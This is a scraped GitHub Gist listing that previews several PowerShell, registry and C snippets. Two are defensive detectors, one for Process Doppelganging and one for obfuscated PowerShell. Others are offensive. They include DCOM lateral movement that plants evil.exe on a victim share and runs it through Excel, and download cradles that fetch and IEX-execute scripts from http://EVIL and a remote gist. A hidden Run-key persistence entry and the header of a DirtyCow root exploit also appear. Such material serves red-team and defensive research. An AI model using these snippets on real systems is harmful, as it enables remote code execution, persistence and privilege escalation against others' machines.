Skip to content

Instantly share code, notes, and snippets.

function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@rxwx
rxwx / foxprow.ps1
Last active September 14, 2017 15:06
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)
@breakersall
breakersall / xml
Created June 21, 2017 23:32
xml with proxy
$proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
$wc.proxy = $proxy
$d = New-Object System.Xml.XmlDocument
$d.Load($wc.DownloadData("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt"));
$d.command.a.execute | iex
@cobbr
cobbr / Invoke-ObfuscationDetection.ps1
Last active September 17, 2024 21:54
Detect obfuscated PowerShell through character frequency analysis.
function Measure-CharacterFrequency
{
<#
.SYNOPSIS
Measures the letter / character frequency in a block of text, ignoring whitespace
and PowerShell comment blocks.
Author: Lee Holmes
@hasherezade
hasherezade / test.reg
Last active December 31, 2023 19:26
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active November 17, 2024 21:45
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object